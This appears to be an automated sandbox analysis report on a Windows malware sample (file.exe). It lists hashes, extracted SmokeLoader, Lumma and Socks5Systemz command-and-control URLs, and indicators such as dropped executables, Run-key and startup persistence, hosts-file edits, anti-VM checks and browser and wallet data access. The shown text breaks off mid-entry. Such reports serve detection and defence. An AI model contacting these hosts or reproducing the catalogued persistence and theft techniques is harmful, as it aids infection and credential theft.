Resubmissions
22-08-2024 15:33
240822-sy6bqsvbng 710-03-2024 16:21
240310-ttpc4aga89 1010-03-2024 12:34
240310-prvpwacf93 10Analysis
-
max time kernel
453s -
max time network
681s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
10-03-2024 16:21
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20240226-en
General
-
Target
file.exe
-
Size
2.4MB
-
MD5
b11c3fad2e48022f58635df7368d6441
-
SHA1
63883fee892ac1e0d44f568913931c0d59b343d1
-
SHA256
2a362d6d3bceaf1159bc245499a778f1ab9c229c3cbd4be4c63a582a716a4c80
-
SHA512
6c68523b259c307e1c4ff4c6809fb20e5d9d9998a32d03ca06eaf29ec8f27bcaca2cafd9b57420b307160b3ebfeac16d234b99f6119f8f3038f4b5bf4b169023
-
SSDEEP
49152:jCqqfqaaK++EFUw2PsQMIZnLzn8FGaqxMBeVBBzKl:jONGXqGY1y
Malware Config
Extracted
smokeloader
pub1
Extracted
smokeloader
2022
http://trad-einmyus.com/index.php
http://tradein-myus.com/index.php
http://trade-inmyus.com/index.php
Extracted
lumma
https://wisemassiveharmonious.shop/api
https://colorfulequalugliess.shop/api
https://relevantvoicelesskw.shop/api
https://associationokeo.shop/api
https://resergvearyinitiani.shop/api
Extracted
socks5systemz
http://aiueiup.ru/search/?q=67e28dd83a5da32a155afd1b7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978a271ea771795af8e05c644db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608fff11c8e7949f3d
http://aibukfn.ru/search/?q=67e28dd83a5da32a155afd1b7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978a271ea771795af8e05c644db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608fff11c8e7949f3d
Signatures
-
DcRat 14 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation taskmgr.exe 652 schtasks.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rNkuvk8Zg4i325fSyIYGB9Wt.bat regsvcs.exe 4508 schtasks.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KF9ZwM1htMp18z3Hvz5q82yB.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fG6Eq6XzP5233KSsUEpsaRC8.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\auGVM38sZMaymz2pA3UtXgzI.bat regsvcs.exe 2420 schtasks.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sjbOP8xnNE7tcTgPiGZ6wwas.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ksGwX541NFYLLQyfzzA31AQ8.bat regsvcs.exe 3148 schtasks.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KJ7YeE2j2u6MjBVRbzctBXge.bat regsvcs.exe 1892 schtasks.exe 336 schtasks.exe -
Glupteba payload 3 IoCs
resource yara_rule behavioral2/memory/5132-157-0x0000000002E10000-0x00000000036FB000-memory.dmp family_glupteba behavioral2/memory/5132-160-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/5132-247-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts eNjkg8FaEHV29ts9FvoPTUAW.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe File created C:\Windows\system32\drivers\etc\hosts SvBLsShwKaL8PBWdxkM39f0T.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 1108 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation DD14.exe -
Drops startup file 14 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KJ7YeE2j2u6MjBVRbzctBXge.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GdoQsQKJMNaKGyIxLiOgybfw.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\auGVM38sZMaymz2pA3UtXgzI.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rNkuvk8Zg4i325fSyIYGB9Wt.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ksGwX541NFYLLQyfzzA31AQ8.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fG6Eq6XzP5233KSsUEpsaRC8.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f1ODWN4z7ta2SjcSOf0vGFq5.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1u4JgkTky8yZgPPekFi7TGF4.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vUoKruUEtYqpKN3g8HfnfUiJ.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dk8dESr3kL9No4zXo1hFURzq.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sjbOP8xnNE7tcTgPiGZ6wwas.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eEStE6qx5rsB5duSlZN80DNR.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KF9ZwM1htMp18z3Hvz5q82yB.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFyXFu8vFw28FFkvTMLOmWRL.bat regsvcs.exe -
Executes dropped EXE 48 IoCs
pid Process 6140 jVcQfTbmL2u1ousPu7tmRClP.exe 5168 vn0dZ1KknFaoEqIsGOGNDVH5.exe 5132 GNL8HPgpc3h1ughp9OmayOAG.exe 392 6VC6yCs5XvpI0RU46xUTlGFH.exe 1052 jVcQfTbmL2u1ousPu7tmRClP.tmp 5388 syncUpd.exe 5480 babyclock.exe 1592 babyclock.exe 4752 BroomSetup.exe 5344 tJ6HSphWPkDhrW4fuBx7FKRM.exe 512 tJ6HSphWPkDhrW4fuBx7FKRM.exe 1752 tJ6HSphWPkDhrW4fuBx7FKRM.exe 912 tJ6HSphWPkDhrW4fuBx7FKRM.exe 3720 tJ6HSphWPkDhrW4fuBx7FKRM.exe 5576 eNjkg8FaEHV29ts9FvoPTUAW.exe 1756 GNL8HPgpc3h1ughp9OmayOAG.exe 536 updater.exe 4332 Assistant_108.0.5067.20_Setup.exe_sfx.exe 5208 assistant_installer.exe 5048 assistant_installer.exe 3404 DD14.exe 5536 csrss.exe 2712 DD14.exe 5992 DD14.exe 3352 8F7.exe 5392 DD14.exe 5488 cwvffbi 5904 injector.exe 5388 windefender.exe 5880 windefender.exe 5476 B159.exe 3852 EE16.exe 2612 zauJwzNDKtlWh0Su7sA66DV7.exe 1588 p1ZjVvAKBV5XkBUaTd0q2FDb.exe 5000 Dg5JITRiu73KmlTOTIZVk9xg.exe 4464 zauJwzNDKtlWh0Su7sA66DV7.tmp 2064 syncUpd.exe 3148 q4oVVOJYlJSTjyE4pBQQcwUd.exe 5488 BroomSetup.exe 3924 7FD3.exe 3052 SvBLsShwKaL8PBWdxkM39f0T.exe 4764 babyclock.exe 2516 babyclock.exe 2108 Z5Pwcmkmjtj7jGqzkWXixJVL.exe 6108 Z5Pwcmkmjtj7jGqzkWXixJVL.exe 3400 Z5Pwcmkmjtj7jGqzkWXixJVL.exe 1996 Dg5JITRiu73KmlTOTIZVk9xg.exe 6064 updater.exe -
Loads dropped DLL 21 IoCs
pid Process 392 6VC6yCs5XvpI0RU46xUTlGFH.exe 1052 jVcQfTbmL2u1ousPu7tmRClP.tmp 392 6VC6yCs5XvpI0RU46xUTlGFH.exe 5344 tJ6HSphWPkDhrW4fuBx7FKRM.exe 512 tJ6HSphWPkDhrW4fuBx7FKRM.exe 1752 tJ6HSphWPkDhrW4fuBx7FKRM.exe 912 tJ6HSphWPkDhrW4fuBx7FKRM.exe 3720 tJ6HSphWPkDhrW4fuBx7FKRM.exe 5388 syncUpd.exe 5388 syncUpd.exe 5208 assistant_installer.exe 5208 assistant_installer.exe 5048 assistant_installer.exe 5048 assistant_installer.exe 2428 taskmgr.exe 1588 p1ZjVvAKBV5XkBUaTd0q2FDb.exe 4464 zauJwzNDKtlWh0Su7sA66DV7.tmp 1588 p1ZjVvAKBV5XkBUaTd0q2FDb.exe 2108 Z5Pwcmkmjtj7jGqzkWXixJVL.exe 6108 Z5Pwcmkmjtj7jGqzkWXixJVL.exe 3400 Z5Pwcmkmjtj7jGqzkWXixJVL.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 336 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000600000001da3c-147.dat upx behavioral2/files/0x000600000001da3c-146.dat upx behavioral2/memory/4752-149-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral2/files/0x000600000001da8b-196.dat upx behavioral2/files/0x000600000001da8b-208.dat upx behavioral2/files/0x000600000001da8b-212.dat upx behavioral2/memory/4752-217-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral2/memory/5344-216-0x0000000000B20000-0x0000000001058000-memory.dmp upx behavioral2/files/0x000600000001da8b-229.dat upx behavioral2/memory/512-231-0x0000000000B20000-0x0000000001058000-memory.dmp upx behavioral2/files/0x0007000000020234-244.dat upx behavioral2/memory/1752-255-0x0000000000A20000-0x0000000000F58000-memory.dmp upx behavioral2/memory/1752-263-0x0000000000A20000-0x0000000000F58000-memory.dmp upx behavioral2/files/0x000600000001da8b-264.dat upx behavioral2/files/0x000600000001da8b-281.dat upx behavioral2/memory/912-284-0x0000000000B20000-0x0000000001058000-memory.dmp upx behavioral2/memory/3720-288-0x0000000000B20000-0x0000000001058000-memory.dmp upx behavioral2/memory/4752-319-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral2/memory/5344-320-0x0000000000B20000-0x0000000001058000-memory.dmp upx behavioral2/memory/4752-377-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral2/files/0x000b0000000233bc-1372.dat upx -
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 91.211.247.248 Destination IP 91.211.247.248 -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" GNL8HPgpc3h1ughp9OmayOAG.exe Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\0e5d7f2d-6754-4be0-b473-73a35806b01c\\DD14.exe\" --AutoStart" DD14.exe Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 6 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: tJ6HSphWPkDhrW4fuBx7FKRM.exe File opened (read-only) \??\F: tJ6HSphWPkDhrW4fuBx7FKRM.exe File opened (read-only) \??\D: tJ6HSphWPkDhrW4fuBx7FKRM.exe File opened (read-only) \??\F: tJ6HSphWPkDhrW4fuBx7FKRM.exe File opened (read-only) \??\D: Z5Pwcmkmjtj7jGqzkWXixJVL.exe File opened (read-only) \??\F: Z5Pwcmkmjtj7jGqzkWXixJVL.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 74 pastebin.com 75 pastebin.com 190 bitbucket.org 191 bitbucket.org 282 pastebin.com 284 pastebin.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 174 api.2ip.ua 176 api.2ip.ua 343 ip-api.com -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 13 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe eNjkg8FaEHV29ts9FvoPTUAW.exe File opened for modification C:\Windows\system32\eventvwr.msc mmc.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\MRT.exe SvBLsShwKaL8PBWdxkM39f0T.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 5652 set thread context of 5724 5652 file.exe 123 PID 536 set thread context of 508 536 updater.exe 222 PID 536 set thread context of 3008 536 updater.exe 227 PID 3404 set thread context of 2712 3404 DD14.exe 241 PID 3352 set thread context of 2348 3352 8F7.exe 249 PID 5992 set thread context of 5392 5992 DD14.exe 250 PID 3852 set thread context of 4764 3852 EE16.exe 280 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN GNL8HPgpc3h1ughp9OmayOAG.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\rss\csrss.exe GNL8HPgpc3h1ughp9OmayOAG.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\rss GNL8HPgpc3h1ughp9OmayOAG.exe -
Launches sc.exe 27 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5492 sc.exe 5600 sc.exe 5860 sc.exe 3112 sc.exe 6124 sc.exe 3268 sc.exe 6124 sc.exe 1604 sc.exe 1864 sc.exe 2336 sc.exe 5648 sc.exe 4736 sc.exe 3944 sc.exe 2072 sc.exe 4032 sc.exe 3832 sc.exe 5076 sc.exe 1220 sc.exe 5400 sc.exe 2364 sc.exe 2596 sc.exe 5788 sc.exe 2064 sc.exe 2248 sc.exe 456 sc.exe 4120 sc.exe 4084 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 5220 5388 WerFault.exe 133 536 5392 WerFault.exe 250 5232 2064 WerFault.exe 285 -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x00050000000168bb-77.dat nsis_installer_2 behavioral2/files/0x00050000000168bb-82.dat nsis_installer_2 behavioral2/files/0x00050000000168bb-81.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cwvffbi Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vn0dZ1KknFaoEqIsGOGNDVH5.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vn0dZ1KknFaoEqIsGOGNDVH5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cwvffbi Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cwvffbi Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI q4oVVOJYlJSTjyE4pBQQcwUd.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vn0dZ1KknFaoEqIsGOGNDVH5.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI q4oVVOJYlJSTjyE4pBQQcwUd.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI q4oVVOJYlJSTjyE4pBQQcwUd.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 syncUpd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString syncUpd.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3148 schtasks.exe 4508 schtasks.exe 1892 schtasks.exe 652 schtasks.exe 2420 schtasks.exe 336 schtasks.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3560 tasklist.exe 640 tasklist.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 411 Go-http-client/1.1 -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Internet Explorer\Toolbar Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Process not Found -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" GNL8HPgpc3h1ughp9OmayOAG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-362 = "GTB Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" GNL8HPgpc3h1ughp9OmayOAG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" GNL8HPgpc3h1ughp9OmayOAG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" GNL8HPgpc3h1ughp9OmayOAG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2791 = "Novosibirsk Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" GNL8HPgpc3h1ughp9OmayOAG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" GNL8HPgpc3h1ughp9OmayOAG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" GNL8HPgpc3h1ughp9OmayOAG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" GNL8HPgpc3h1ughp9OmayOAG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" GNL8HPgpc3h1ughp9OmayOAG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" GNL8HPgpc3h1ughp9OmayOAG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" GNL8HPgpc3h1ughp9OmayOAG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" GNL8HPgpc3h1ughp9OmayOAG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" GNL8HPgpc3h1ughp9OmayOAG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" GNL8HPgpc3h1ughp9OmayOAG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" GNL8HPgpc3h1ughp9OmayOAG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" GNL8HPgpc3h1ughp9OmayOAG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" GNL8HPgpc3h1ughp9OmayOAG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local 